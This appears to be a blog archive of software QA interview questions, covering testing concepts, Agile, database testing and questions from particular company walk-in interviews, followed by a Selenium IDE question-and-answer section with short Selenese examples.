Archive
Important interview questions for QA
Please find below mentioned questions…good to know all these things before get into Software QA job. And Most important …i know that you guyz can get all these information @ internet or google…it, but my intention is to collect&share all types of QA interview questions..so that you guyz can pass/refer to rest of your friendz..
1. What types of documents would you need for QA, QC, and Testing?
2. What did you include in a test plan?
3. Describe any bug you remember.
4. What is the purpose of the testing?
5. What do you like (not like) in this job?
6. What is quality assurance?
7. What is the difference between QA and testing?
8. How do you scope, organize, and execute a test project?
9. What is the role of QA in a development project?
10. What is the role of QA in a company that produces software?
11. Define quality for me as you understand it
12. Describe to me the difference between validation and verification.
13. Describe to me what you see as a process. Not a particular process, just the basics of having a process.
14. Describe to me when you would consider employing a failure mode and effect analysis.
15. Describe to me the Software Development Life Cycle as you would define it.
16. What are the properties of a good requirement?
17. How do you differentiate the roles of Quality Assurance Manager and Project Manager?
18. Tell me about any quality efforts you have overseen or implemented. Describe some of the challenges you faced and how you overcame them.
19. How do you deal with environments that are hostile to quality change efforts?
20. In general, how do you see automation fitting into the overall process of testing?
21. How do you promote the concept of phase containment and defect prevention?
22. If you come onboard, give me a general idea of what your first overall tasks will be as far as starting a quality effort.
23. What kinds of testing have you done?
24. Have you ever created a test plan?
25. Have you ever written test cases or did you just execute those written by others?
26. What did your base your test cases?
27. How do you determine what to test?
28. How do you decide when you have ‘tested enough?’
29. How do you test if you have minimal or no documentation about the product?
30. Describe me to the basic elements you put in a defect report?
31. How do you perform regression testing?
32. At what stage of the life cycle does testing begin in your opinion?
33. How do you analyze your test results? What metrics do you try to provide?
34. Realising you won’t be able to test everything – how do you decide what to test first?
35. Where do you get your expected results?
36. If automating – what is your process for determining what to automate and in what order?
37. In the past, I have been asked to verbally start mapping out a test plan for a common situation, such as an ATM. The interviewer might say, “Just thinking out loud, if you were tasked to test an ATM, what items might you test plan include? “These type questions are not meant to be answered conclusively, but it is a good way for the interviewer to see how you approach the task.
38. If you’re given a program that will average student grades, what kinds of inputs would you use?
39. Tell me about the best bug you ever found.
40. What made you pick testing over another career?
41. What is the exact difference between Integration & System testing, give me examples with your project.
42. How did you go about testing a project?
43. When should testing start in a project? Why?
44. How do you go about testing a web application?
45. Difference between Black & White box testing
46. What is Configuration management? Tools used?
47. What do you plan to become after say 2-5yrs (Ex: QA Manager, Why?)
48. Would you like to work in a team or alone, why?
49. Give me 5 strong & weak points of yours
50. Why do you want to join our company?
51. When should testing be stopped?
52. What sort of things would you put down in a bug report?
53. Who in the company is responsible for Quality?
54. Who defines quality?
55. What is an equivalence class?
56. Is a “A fast database retrieval rate” a testable requirement?
57. Should we test every possible combination / scenario for a program?
58. What criteria do you use when determining when to automate a test or leave it manual?
59. When do you start developing your automation tests?
60. Discuss what test metrics you feel are important to publish an organization?
61. In case anybody cares, here are the questions that I will be asking:
62. Describe the role that QA plays in the software lifecycle.
63. What should Development require of QA?
64. What should QA require of Development?
65. How would you define a “bug?”
66. Give me an example of the best and worst experiences you’ve had with QA.
67. How does unit testing play a role in the development / software lifecycle?
68. Explain some techniques for developing software components with respect to testability.
69. Describe a past experience with implementing a test harness in the development of software.
70. Have you ever worked with QA in developing test tools? Explain the participation Development should have with QA in leveraging such test tools for QA use.
71. Give me some examples of how you have participated in Integration Testing.
72. How would you describe the involvement you have had with the bug-fix cycle between Development and QA?
73. What is unit testing?
74. Describe your personal software development process.
75. How do you know when your code has met specifications?
76. How do you know your code has met specifications when there are no specifications?
77. Describe your experiences with code analyzers.
78. How do you feel about cyclomatic complexity?
79. Who should test your code?
80. How do you survive chaos?
81. What processes / methodologies are you familiar with?
82. What type of documents would you need for QA / QC / Testing? 83. How can you use technology to solve problem?
84. What type of metrics would you use?
85. How to find that tools work well with your existing system?
86. What automated tools are you familiar with?
87. How well you work with a team?
88. How would you ensure 100% coverage of testing?
89. How would you build a test team?
90. What problem you have right now or in the past? How you solved it?
91. What will you do during the first day of job?
92. What would you like to do five years from now?
93. Tell me about the worst boss you’ve ever had.
94. What are your greatest weaknesses?
95. What are your strengths?
96. What is a successful product?
97. What do you like about Windows?
98. What is good code?
99. Who is Kent Beck, Dr Grace Hopper, Dennis Ritchie?
100. What are basic, core, practises for a QA specialist?
101. What do you like about QA?
102. What has not worked well in your previous QA experience and what would you change?
103. How you will begin to improve the QA process?
104. What is the difference between QA and QC?
105. What is UML and how to use it for testing?
106. What is CMM and CMMI? What is the difference?
107. What do you like about computers?
108. Do you have a favourite QA book? More than one? Which ones? And why.
109. What is the responsibility of programmers vs QA?
110. What are the properties of a good requirement?
111. Ho to do test if we have minimal or no documentation about the product?
112. What are all the basic elements in a defect report? ____________________________________________________________________________________
Additional Questions for interview purpose… (Some questions may repeat again…)
1. What is Software Testing?
2. What is the Purpose of Testing?
3. What types of testing do testers perform?
4. What is the Outcome of Testing?
5. What kind of testing have you done?
6. What is the need for testing?
7. What are the entry criteria for Functionality and Performance testing?
8. What is test metrics?
9. Why do you go for White box testing, when Black box testing is available?
10. What are the entry criteria for Automation testing?
11. When to start and Stop Testing?
12. What is Quality?
13. What is Baseline document, Can you say any two?
14. What is verification?
15. What is validation?
16. What is quality assurance?
17. What is quality control?
18. What is SDLC and TDLC?
19. What are the Qualities of a Tester?
20. When to start and Stop Testing?
21. What are the various levels of testing?
22. What are the types of testing you know and you experienced?
23. What exactly is Heuristic checklist approach for unit testing?
24. After completing testing, what would you deliver to the client? 25. What is a Test Bed?
26. What is a Data Guidelines?
27. Why do you go for Test Bed?
28. What is Severity and Priority and who will decide what?
29. Can Automation testing replace manual testing? If it so, how? 30. What is a test case?
31. What is a test condition?
32. What is the test script?
33. What is the test data?
34. What is an Inconsistent bug?
35. What is the difference between Re-testing and Regression testing?
36. What are the different types of testing techniques?
37. What are the different types of test case techniques?
38. What are the risks involved in testing?
39. Differentiate Test bed and Test Environment?
40. What ifs the difference between defect, error, bug, failure, fault? 41. What is the difference between quality and testing?
42. What is the difference between White & Black Box Testing?
43. What is the difference between Quality Assurance and Quality Control?
44. What is the difference between Testing and debugging?
45. What is the difference between bug and defect?
46. What is the difference between verification and validation?
47. What is the difference between functional spec. and Business requirement specification?
48. What is the difference between unit testing and integration testing?
49. What is the diff between Volume & Load?
50. What is diff between Volume & Stress?
51. What is the diff between Stress & Load Testing?
52. What is the Diff between Two Tier & Three tier Architecture?
53. What is the diff between Client Server & Web Based Testing?
54. What is the diff between Integration & System Testing?
55. What is the Diff between Code Walkthrough & Code Review?
56. What is the diff between walkthrough and inspection?
57. What is the Diff between SIT & IST?
58. What is the Diff between static and dynamic?
59. What is the diff between alpha testing and beta testing?
60. What are the Minimum requirements to start testing?
61. What is Smoke Testing & when it will be done?
62. What is Adhoc Testing? When it can be done?
63. What is cookie testing?
64. What is security testing?
65. What is database testing?
66. What is the relation ship between Quality & Testing?
67. How do you determine, what to be tested?
68. How do you go about testing a project?
69. What is the Initial Stage of testing?
70. What is Web Based Application Testing?
71. What is Client Server Application Testing?
72. What is Two Tier & Three tier Architecture?
73. What is the use of Functional Specification?
74. Why do we prepare test condition, test cases, test script (Before Starting Testing)?
75. Is it not waste of time in preparing the test condition, test case & Test Script? 7
6. How do you go about testing of Web Application?
77. How do you go about testing of Client Server Application?
78. What is meant by Static Testing?
79. Can the static testing be done for both Web & Client Server Application?
80. In the Static Testing, what all can be tested?
81. Can test condition, test case & test script help you in performing the static testing?
82. What is meant by dynamic testing?
83. Is the dynamic testing a functional testing?
84. Is the Static testing a functional testing?
85. What are the functional testing you perform?
86. What is meant by Alpha Testing?
87. What kind of Document you need for going for an Functional testing?
88. What is meant by Beta Testing?
89. At what stage the unit testing has to be done?
90 Who can perform the Unit Testing?
91. When will the Verification & Validation be done?
92. What is meant by Code Walkthrough?
93. What is meant Code Review?
94. What is the testing that a tester performs at the end of Unit Testing?
95. What are the things, you prefer & Prepare before starting Testing?
96. What is Integration Testing?
97. What is Incremental Integration Testing?
98. What is meant by System Testing?
99. What is meant by SIT?
100 .When do you go for Integration Testing?
101 Can the System testing be done at any stage?
102. What are stubs & drivers?
103. What is the Concept of Up-Down & Down-Up in Testing in integration testing?
104. What is the final Stage of Integration Testing?
105. Where in the SDLC, the Testing Starts?
106. What is the Outcome of Integration Testing?
107. What is meant by GUI Testing?
108. What is meant by Back-End Testing?
109. What are the features, you take care in Prototype testing?
110. What is Mutation testing & when can it be done?
111. What is Compatibility Testing?
112. What is Usability Testing?
113 What is the Importance of testing?
114. What is meant by regression Testing?
115. When we prefer Regression & what are the stages where we go for Regression Testing?
116. What is performance testing?
117. What is the Performance testing; those can be done Manually & Automatically?
118 What is Volume, Stress & Load Testing?
119. What is a Bug?
120. What is a Defect?
121. What is the defect Life Cycle?
122. What is the Priority in fixing the Bugs?
123. Explain the Severity you rate for the bugs found?
124. Diff between UAT & IST?
125. What is meant by UAT?
126. What all are the requirements needed for UAT?
127. What are the docs required for Performance Testing?
128. What is risk analysis?
129. How to do risk management?
130. What are test closure documents?
131. What is traceability matrix?
132. What ways you followed for defect management?
Source:
Interview Questions on Agile Development
Interview Questions on Agile Development Methodologies
1) What is Agile Development model and explain about different methodologies in Agile Software development?
Agile Development model is an Incremental or iterative model,
It has several methodologies,
Types of Agile Methodologies
o Scrum
o Extreme Programming (XP)
o Agile Unified Process (AUP)
o Dynamic Systems Development Method (DSDM)
o Essential Unified Process (EssUP)
o Exia Process (ExP)
o Feature Driven Development (FDD)
o Open Unified Process (OpenUP)
o Crystal Clear
o Velocity tracking
2) What is the difference between Agile and Waterfall Model?
Difference between Agile and Waterfall Model:
1. The main advantage is the backward scalability in Agile. Under waterfall approach we cannot change the decisions and implementations that we had made under the previous stages. If we want to make changes under waterfall we will have to build the entire project from the scratch once again.
2. The flexibility to error check under any part of the development stage makes Agile more bug free and less erroneous as compared to Waterfall which can only test bugs at the end of the development module.
3. Since Agile provides flexibility to make changes as per customer requirements it is more inclined towards better client satisfaction. This is a real set back for the Waterfall model which doesn’t allow any modifications once the module has been completed.
4. Under Agile development modular partitioning of the software can be effectively carried out as compared to its counterpart. Though both of them allows option for segregation the later lacks the modifications in the implementation stage. The rules are set down before the commencement of the project hence it hinders further break down of the logical module. Whereas Agile can be of great help under such situations and can allow simultaneous development of different modules at the same time as per time bound requirement. If we want the project to be more segregated Agile comes as a pain relief for developers.
3) How Agile is different?
Agile is different because
a) Greater Collaboration.
b) Shorter work cycle and constant feedback.
c) Need to embrace Change.
d) Greater flexibility.
e) Greater discipline.
f) Greater stakeholder accountability.
g) Greater range of skills.
4) What are the implications for testing in Agile?
– Agile testing must be iterative.
– Testers cannot rely on having complete specification.
– Agile testers must be flexible.
5) What are the Agile quality strategies?
Agile quality strategies are:
a) Re-factoring.
b) Non-solo development.
c) Static and dynamic code analysis
d) Reviews and inspection
– Iteration/sprint demos
– All-hands demo
– Light-weight milestone reviews
e) Short feedback cycles.
f) Standards and guidelines.
6) Explain about the Agile process?
The agile process follows the software development life cycle which includes requirements gathering, analysis, design, coding, testing and delivers partially implemented software and waits for the customer feedback. In the whole process, customer satisfaction is at highest priority with faster development time.
7) What are the new features of agile process?
In agile process new features can be added easily by using multiple iterations.
1. Iterative: The main objective of agile software processes is satisfaction of customers, so it focuses on single requirement with multiple iterations.
2. Modularity
Agile process decomposes the complete system into manageable pieces called modules. Modularity plays a major role in software development processes.
3. Time Boxing
As agile process is iterative in nature, it requires the time limits on each module with respective cycle.
4. Parsimony
In agile processes parsimony is required to mitigate risks and achieve the goals by minimal number of modules.
5. Incremental
As the agile process is iterative in nature, it requires the system to be developed in increments, each increment is independent of others, and at last all increments are integrated into complete system.
6. Adaptive
Due to the iterative nature of agile process new risks may occurs. The adaptive characteristic of agile process allows adapting the processes to attack the new risks and allows changes in the real time requirements.
7. Convergent
All the risks associated with each increment are convergent in agile process by using iterative and incremental approach.
9. Collaborative
As agile process is modular in nature, it needs a good communication among software development team.
Different modules need to be integrated at the end of the software development process.
10. People Oriented
In the agile processes customer satisfaction is the first priority over the technology and process. A good software development team increases the performance and productivity of the software.
8) Where the agile methods focus on?
The agile methods are focused on different aspects of the software development life cycle. Some focus on the practices (extreme programming, pair programming), while others focus on managing the software projects (the scrum approach).
9) What are the benefits of Agile Modeling?
Agile methodology has an adaptive team which is able to respond to the changing requirements.
The team does not have to invest time and effort and finally find that by the time they delivered the product, the requirement of the customer has changed.
Face to face communication and continuous inputs from customer representative leaves no space for guesswork.
The documentation is crisp and to the point to save time.
The end result is the high quality software in least possible time duration and satisfied customer.
Database Testing questions asked by Interviewer @IGATE
Below are the few database testing questions which have been asked by interviewer when I’ve attended the IGATE walk-in Drive.
Company: Patni Computer System ( Now it’s iGATE)
Interview Type: Walk-in Drive
Date : 18th September 2010, Saturday
- What is Database testing & What we normally check for in the Database Testing?
- How to Test database in Manually? Explain with an example.
- What is data driven test?
- How to check a trigger is fired or not, while doing database testing?
- How to Test Database Procedures and Triggers?
- Is a “A fast database retrieval rate” a testable requirement?
- What SQL statements have you used in Database Testing?
- What are different Joins, Give example of each.
- Can you delete a parent table record if there is a child table record exits? How ?
- What is Referential Integrity.
- What is RowID
- How to know the database version
- How to execute SQL script in Query window
- How to create temporary variable
- How to print an Environment variable
- What is meant by Database user, how it is different from Login
Knowledge Work Book – Interview Question Bank(QA)
Company: Cybage Software [An SEI-CMMI Level 5 assessed & V1.3 Company] www.cybage.com
Interview Type: Walk-in/Referral walk-in
Date: 11th August 2012
Venue: CT1, Kalyaninagar, PUNE
Rakesh Hansalia (QA, Cybage, Gandhinagar ) http://www.linkedin.com/in/rakeshhansalia
Below are the questions which were asked to the candidates in the walk-in interview for QA position:
1) Describe yourself
2) Describe your current project?
3) Which is the android latest version?
4) What is the difference between Android 2.1 and Android 2.2?
5) Oops concepts.
6) Difference between a class and a interface.
7) Different version control.
8) SQL queries.
9) Do you have any idea of join in sql?
10) Test case format
11) What are smoke, regression and functional testing?
12) Bug Life cycle
13) What is equivalence partitioning?
14) How to identify an object in selenium and QTP?
15) How to display a message in Selenium?
16) Different views in QTP.
17) Different modes in QTP.
18) What is test automation framework?
19) What are different types of automation frameworks?
20) How you do security testing for an application?
21) What content you include in test status report?
22) How you have mentored your team? ( This question is applicable if you have written in your CV that you have mentored)
23) Have you prepared test plan? If yes, then what content you include in test plan?
24) Would you like to ask any questions from us?
25) Describe application certification testing.
26) How you do certification testing?
27) What role you are playing in your current company?
28) What are the differences and similarity between the mobile app which you are testing in your current project with the app if you tested it on windows?
29) Difference between System testing and Functional testing.
30) 3 most important test scenarios for a pen.
31) 3 least important test scenarios for a pen from user point of view.
32) Suppose 100 requirements are there, how will you estimate them?
33) Suppose 1000 tcs are there, will you run all 1000 tcs on all devices?
34) 3 assert commands.
35) Difference between Selenium Web driver, RC and IDE.
36) Rate yourself for automation.
37) What are the components of QTP?
38) Do you have knowledge of sql?
39) What is compatibility testing? Is compatibility testing functional or non functional?
40) What is non-functional testing?
41) Relate usability and reliability with your current project.
42) Suppose somebody is not comfortable with you in your team and he/she does not tell anybody what he/she feels but you know that your peer is not comfortable then what will you do?
43) If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.
44) Do you have any questions which you want to ask?
45) What is root cause analysis?
46) 3 scenarios for which you as a tester can’t do root cause analysis or help developer to know the what is the reason for a bug?
47) write a c program to create a pattern : 1
2 2
3 3 3
48) What is stdio.h?
49) What is a library?
50) Tell me the names of 3 libraries.
51) Tell me the names of 5 automation tools for mobile.
52) Suppose you are the only resource and work is of 3 days and you have to complete it in 2 days, then what will you do?
53) Suppose you have to select device for an application which should work on latest as well as previous Android versions, then which device will you select?
54) What is polymorphism?
Interview Questions @ Polaris
a. Interview Date:29-05-2010
b. Company Name: Polaris
c. Location:Hyderabad
I faced following questions in Polaris Interview.
1. Tell me about u r current organization
2. what is Black box testing?
3. what is white box testing?
4. What is Functional Testing?
5. What is difference between Black box & functional
6. what is test plan?
7. what is test strategy?
8. what is difference between Test plan & test strategy?
9. What is smoke testing
10 what is sanity testing?
11. who will perform smoke testing?
12. Explain about Agile process?
13. How much you know about QTP? ( I mentioned in my resume as Exposure on QTP)
14. Explain about u r current project?
15. What is the Requirement Traceability Matrix?
16. Can u draw the template for Requirement Traceability Matrix?
17. What is Ad-hoc Testing?
18. What is difference between ReTesting and Regression Testing.
19. Can u explain about Bug life cycle?
20. How can u make sure whether all requirements are covered or not?
21. Can u explain biggest complexity in current project?
22. what is difference between bug severity and priority?
23. Which bug tracking tool is u r using?
24. can u give one example for High severity and low priority bug?
25. can u give one example for High priority and low severity bug?
26. What is security Testing?
Selenium IDE Interview Questions & Answers -Rakesh Hansalia
1. What do you know about Selenium?
Selenium is a suite of tools for web automation testing. Selenium first came to life in 2004 when Jason Huggins was testing an internal application at Thought Works. Selenium was a tremendous tool, it wasn’t without its drawbacks. Because of its JavaScript based automation engine and the security limitations browsers apply to JavaScript, different things became impossible to do.
Selenium Suite of projects includes:
Selenium IDE
Selenium Core
Selenium 1 (known as Selenium RC or Remote Control)
Selenium 2 (known as Selenium Web driver)
Selenium-Grid
2. What are the technical challenges with selenium?
As you know Selenium is a free ware open source testing tool. There are many challenges with Selenium.
–>Selenium Supports only web based applications
–>It doesn’t support any non web based (Like Win 32, Java Applet, Java Swing, .Net Client Server etc) applications
–>When you compare selenium with QTP, Silk Test, Test Partner and RFT, there are many challenges in terms of maintainability of the test cases
–>Since Selenium is a freeware tool, there is no direct support if one is in trouble with the support of applications
–>There is no object repository concept in Selenium, so maintainability of the objects is very high
–>There are many challenges if one have to interact with Win 32 windows even when you are working with Web based applications
–>Bitmap comparison is not supported by Selenium
–>Any reporting related capabilities, you need to depend on third party tools
–>You need to learn any one of the native language like (.Net, Java, Perl, Python, PHP, Ruby) to work efficiently with the scripting side of selenium
3. What are the test types supported by Selenium?
Selenium could be used for testing the web based applications.
The test types can be supported are:
1. Functional,
2. Regression,
3. Load testing
The automation tool could be implemented for post release validation with continuous integration tools like:
1. Jenkins,
2. Hudson,
3. Quick Build
4. CruiseCont
4. What are the capabilities of Selenium IDE?
Selenium IDE (Integrated Development Environment) works similar to commercial tools like QTP, Silk Test and Test Partner etc. The below mentioned points describes well about Selenium IDE.
1. Selenium IDE is a Firefox add-on.
2. Selenium IDE can support recording the clicks, typing, and other actions to make a test cases.
3. Using Selenium IDE A Tester can play back the test cases in the Firefox browser
4. Selenium IDE supports exporting the test cases and suites to Selenium RC.
5. debugging of the test cases with step-by-step can be done
6. Breakpoint insertion is possible
7. Page abstraction functionality is supported by Selenium IDE
8. Selenium IDE can support an extensibility capability allowing the use of add-ons or user extensions that expand the functionality of Selenium IDE
5. What are the challenges with Selenium IDE?
Selenium-IDE does not directly support:
1. Condition statements
2. Iteration or looping
3. Logging and reporting of test results
4. Error handling, particularly unexpected errors
5. Database testing
6. Test case grouping
7. Re-execution of failed tests
8. Test case dependency
9. Capture screenshots on test failures
10. Results Report generations
6. Which are the browsers supported by Selenium IDE?
Selenium IDE supports only one browser Mozilla Firefox. The versions supported as of now are:
Mozilla Firefox 2.x
Mozilla Firefox 3.x
The versions not supported as of now are:
earlier versions of Mozilla Firefox 2.x
Mozilla Firefox 4.x
7. How to execute a single line command from Selenium IDE?
Single line command from Selenium IDE can be executed in two ways
1. Right click on the command in Selenium IDE and select “Execute This Command”
2. Select the command in Selenium IDE and press “X” key on the keyboard
8. How to insert a start point in Selenium IDE?
Start point Selenium IDE can be set in two ways
1. Right click on the command in Selenium IDE and select “Set / Clear Start Point”
2. Select the command in Selenium IDE and press “S” key on the keyboard
3. You can have only one start point
4. If you have already set one start point and you selected other command as start point. Then the first start point will be removed and the new start point will be set
9. How to insert a comment in Selenium IDE?
Comments in Selenium IDE can be set in two ways
1. Right click on the command in Selenium IDE and select “Inert New Comment”
2. If you want to comment an existing line. You need to follow the below mentioned steps.
a. Select the source tab in IDE
b. Select the line which you want to comment
c. Assume that if you want to comment a open command you need to write like below mentioned code
<tr>
<!–
<td>open&l/td>
<td>/node/304/edit&l/td>
<td></td>
–>
</tr>
10. How to insert a break point in Selenium IDE?
Break point can be set in two ways in Selenium IDE
1. Right click on the command in Selenium IDE and select “Toggle Break Point”
2. Select the command in Selenium IDE and press “B” key on the keyboard
3. If you want to clear the break point once again Spress “B” key on the keyboard
4. You can set multiple break points in Selenium IDE
11. How to debug the tests in Selenium IDE?
To debug or execute the test cases line by line. Follow the below mentioned steps
1. Insert a break From the location where you want to execute step by step
2. Run the test case
3. Execution will be paused at the given break point
4. Click on the step (Blue) button to continue with the next statement
5. Click on Run button, to continue executing all the commands at a time
12. How to export the tests from Selenium IDE to Selenium RC in different languages?
From selenium IDE the test cases can be exported into the languages
1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby
The below mentioned steps can explain how to export the test cases
1. Open the test case from Selenium IDE
2. Select File -> Export Test Case As
13. How to export Selenium IDE Test Suite to Selenium RC Suites?
From selenium IDE the test suites can be exported into the languages as mentioned below
1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby
The below mentioned steps can explain how to export the test suites
1. Open the test case from Selenium IDE
2. Select File -> Export Test Suite As
14. Which is the command used for displaying the values of a variable into the output console or log?
The command used for displaying the values of a variable into the output console or log – echo
If you want to display a constant string. The below mentioned command can be used
echo <constant string>
ex: echo “The sample message”
If you want to display the value of a variable it can be written like below
echo ${<variable name>>
ex: echo ${var1}
Note: Here var1 is the variable
15. Which are the browsers supported by Selenium RC?
Supported browsers for Selenium RC include:
1. *firefox
2. *mock
3. *firefoxproxy
4. *pifirefox
5. *chrome
6. *iexploreproxy
7. *iexplore
8. *firefox3
9. *safariproxy
10. *googlechrome
11. *konqueror
12. *firefox2
13. *safari
14. *piiexplore
15. *firefoxchrome
16. *opera
17. *iehta
18. *custom
16. Which are the Operating Systems supported by Selenium?
Selenium IDE
Works in Firefox 2+ Start browser, run tests Run tests
Operating Systems Supported:
1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others whichever supports Firefox 2+
Selenium Remote Control
Used for starting browser and run tests
Operating Systems Supported:
1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others
Selenium Core
Used for running tests
Operating Systems Supported:
1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others
17. What is Selenium RC?
Selenium-RC is the solution for tests that need a little more than just simple browser actions and a linear execution. Selenium-RC leverages the full power of programming languages, creating tests that can do things like read and write external files, make queries to a database, send emails with test reports, and practically anything else a user can do with a normal application.
You will want to use Selenium-RC whenever your test requires logic not supported by running a script from Selenium-IDE
18. Why Selenium RC is used?
Selenium-IDE does not directly support:
1. condition statements
2. iteration
3. logging and reporting of test results
4. error handling, particularly unexpected errors
5. database testing
6. test case grouping
7. re-execution of failed tests
8. test case dependency
9. capture screenshots on test failures
The reason behind why Selenium-IDE does not support the above mentioned requirements is IDE supports only HTML language. Using HTML language we cannot achieve the above mentioned requirements. Because HTML does not support conditional, looping and external source connectives.
To overcome the above mentioned problems Selenium RC is used.
Since Selenium RC supports the languages .Net, Java, Perl, Python, PHP, and Ruby. In these languages we can write the programme to achieve the IDE issues
19. Which are the languages supported by Selenium RC?
The languages supported by Selenium RC
1. .Net,
2. Java (Junt 3, Junt 4, TestNG, Groovy)
3. Perl,
4. Python,
5. PHP,
6. Ruby
20. What is Selenium Grid?
Selenium Grid is part of Selenium suite of projects. Selenium Grid transparently distribute your tests on multiple machines so that you can run your tests in parallel, cutting down the time required for running in-browser test suites. This will dramatically speeds up in-browser web testing, giving you quick and accurate feedback you can rely on to improve your web application.
21. What is Selenium WebDriver or Google WebDriver or Selenium 2.0?
WebDriver uses a different underlying framework from Selenium’s javascript Selenium-Core. It also provides an alternative API with functionality not supported in Selenium-RC. WebDriver does not depend on a javascript core embedded within the browser, therefore it is able to avoid some long-running Selenium limitations.
WebDriver’s goal is to provide an API that establishes
• A well-designed standard programming interface for web-app testing.
• Improved consistency between browsers.
• Additional functionality addressing testing problems not well-supported in Selenium 1.0.
The Selenium developers strive to continuously improve Selenium. Integrating WebDriver is another step in that process. The developers of Selenium and of WebDriver felt they could make significant gains for the Open Source test automation community be combining forces and merging their ideas and technologies. Integrating WebDriver into Selenium is the current result of those efforts.
22. What are the capabilities of Selenium WebDriver or Google WebDriver or Selenium 2.0?
One should use WebDriver when requiring improved support for
• Mult-browser testing including improved functionality for browsers not well-supported by Selenium-1.0.
• Handling multiple frames, multiple browser windows, popups, and alerts.
• Page navigation.
• Drag-and-drop.
• AJAX-based UI elements.
23. What is the architecture of Selenium RC?
The Selenium Server which launches and kills browsers, and acts as an HTTP proxy for browser requests.
Client libraries for various programming languages, each of which instructs the Selenium Server in how to test the AUT by passing it your test script’s Selenium commands.
The diagram shows the client libraries communicate with the Server passing each Selenium command for execution. Then the server passes the Selenium command to the browser using Selenium-Core JavaScript commands. The browser, using its JavaScript interpreter, executes the Selenium command, which effectively, runs the check you specified in your Selenese test script.
24. What is the architecture of Selenium Grid?
The below mentioned theory explains about the setup of Selenium Grid with architecture and how it works.
Selenium Grid builds on the traditional Selenium setup, taking advantage of the following properties:
* The Selenium test, the application under test, and the remote control/browser pair do not have to be co-located. They communicate through HTTP, so they can all live on different machines.
* The Selenium tests and the web application under test are obviously specific to a particular project. Nevertheless, neither the Selenium remote control nor the browser is tied to a specific application. As a matter of fact, they provide a capacity that can easily be shared by multiple applications and multiple projects.
Consequently, if only we could build a distributed grid of Selenium Remote Controls, we could easily share it across builds, applications, projects – even potentially across organizations. Of course we would also need to address the scalability issues as described earlier when covering the traditional Selenium setup. This is why we need a component in charge of:
* Allocating a Selenium Remote Control to a specific test (transparently)
* Limiting the number of concurrent test runs on each Remote Control
* Shielding the tests from the actual grid infrastructure
Selenium Grid calls this component the Selenium Hub.
* The Hub exposes an external interface that is exactly the same as the one of a traditional Remote Control. This means that a test suite can transparently target a regular Remote Control or a Selenium Hub with no code change. It just needs to target a different IP address. This is important as it shields the tests from the grid infrastructure (which you can scale transparently). This also makes the developer’s life easier. The same test can be run locally on a developer machine, or run on a heavy duty distributed grid as part of a build – without ever changing a line of code.
* The Hub allocates Selenium Remote Controls to each test. The Hub is also in charge of routing the Selenese requests from the tests to the appropriate Remote Control as well as keeping track of testing sessions.
* When a new test starts, the Hub puts its first request on hold if there is no available Remote Control in the grid providing the appropriate capabilities. As soon as a suitable Remote Control becomes available, the Hub will serve the request. For the whole time, the tests do not have to be aware of what is happening within the grid; it is just waiting for an HTTP response to come back.
25. Does Selenium support mobile internet testing?
Selenium supports Opera. And opera is used in most of the Smart phones. So whichever Smart phone supports opera, selenium can be used to test. So, one can use Selenium RC to run the tests on mobiles.
26. Does Selenium support Google Android Operating System?
Yes, Selenium Web Driver or Google Web Driver or Selenium 2.0 supports Android Operating System. There are several libraries written to support Android Operating System.
27. What are the types of text patterns available in Selenium?
There are three types of patterns available in Selenium
1. globbing
2. regular expressions
3. exact
28. How to use regular expressions in Selenium?
Regular expressions in Selenium IDE can be used with the keyword – regexp: as a prefix to the value and patterns needs to be included for the expected values.
For example if you want to use the regular expression for a command
Command: verifyText
Target: //font/font/b/font[1]
Value: Flight Confirmation # 2011-05-02451
in the above example Flight Confirmation is continuously changing each time you run the test case. So this can be written with a regular expression as mentioned below
Command: verifyText
Target: //font/font/b/font[1]
Value: regexp:Flight Confirmation # [0-9]{4}-[0-9]{2}-[0-9]{5,10}
29. What are the regular expression patterns available in Selenium?
Selenium regular expression patterns offer the same wide array of special characters that exist in JavaScript. Below are a subset of those special characters
| PATTERN | MATCH |
| . | any single character |
| [ ] | character class: any single character that appears inside the brackets |
| * | quantifier: 0 or more of the preceding character (or group) |
| + | quantifier: 1 or more of the preceding character (or group) |
| ? | quantifier: 0 or 1 of the preceding character (or group) |
| {1,5} | quantifier: 1 through 5 of the preceding character (or group) |
| | | alternation: the character/group on the left or the character/group on the right |
| ( ) | grouping: often used with alternation and/or quantifier |
30. What is Selenese?
Selenium set of commands which are used for running the test are called as Selenese.
There are three types of Selenese, those are:
1. Actions – used for performing the operations and interactions with the target elements
2. Assertions – used as check points
3. Accessors – used for storing the values in a variable
31. How do you add check points or verification points in Selenium?
check points or verification points are known as Assertions in Selenium. The keywords with below mentioned prefix will be used for adding check points or verification points.
1. verify
2. assert
3. waitFor
32. What is Assertion in Selenium?
Assertion is nothing but a check or verification point.
Assertion verifies the state of the application conforms to what is expected.
Examples include “make sure the page title is X” and “verify that this checkbox is checked.
33. What are the types of Assertions there in Selenium?
Selenium Assertions can be used in 3 modes:
1) assert – When an “assert” fails, the test will be aborted. If you are executing test suite, the next state case will start
2) verify – When a “verify” fails, the test will continue execution, logging the failure.
3) waitFor – “waitFor” commands wait for some condition to become true (which can be useful for testing Ajax applications). They will succeed immediately if the condition is already true. However, they will fail and halt the test if the condition does not become true within the current timeout setting
34. When to use Assert, Verify and WaitFor in Selenium?
1) assert – If the expected value is mandatory to continue with the next set of steps we will use Assert. As Assert aborts the test, if the expected value doesn’t match. It is good to use for any mandatory checks.
2) verify – If the expected value is optional to continue with the next set of steps we will use Verify. As Verify continues executing with the next set of steps, if the expected value doesn’t match. It is good to use for any optional checks.
3) waitFor – If your test needs to wait, if the expected value is not matching we use waitFor. We normally use waitFor for AJAX kind of controls loading within a page
35. What is an Accessor in Selenium?
Accessor is one of the type of Selenese.
I. Accessors are used for storing the value of a target in a variable.
Ex:
1) storeTitle – Stores the title of a window in a variable
2) storeText – Stores the target element text in a variable
II. Accessors are also used for evaluating the result and storing the result in a variable
Ex: storeTextPresent – Evaluates whether the text is present in the current window. If the text is present stores true in the variable else stores false
Ex: storeEementPresent – Evaluates whether the element is present in the current window. If the element is present stores true in the variable else stores false
36. When to use Accessors in Selenium?
Accessors are mostly used for storing the value in a variable.
The variable can be used for following reasons:
1) To get the value from an element and comparing with some dynamic value
2) To take a logical decision to execute the test steps
ex: if the value of the variable true execute step1 and step2 else step3 and step4
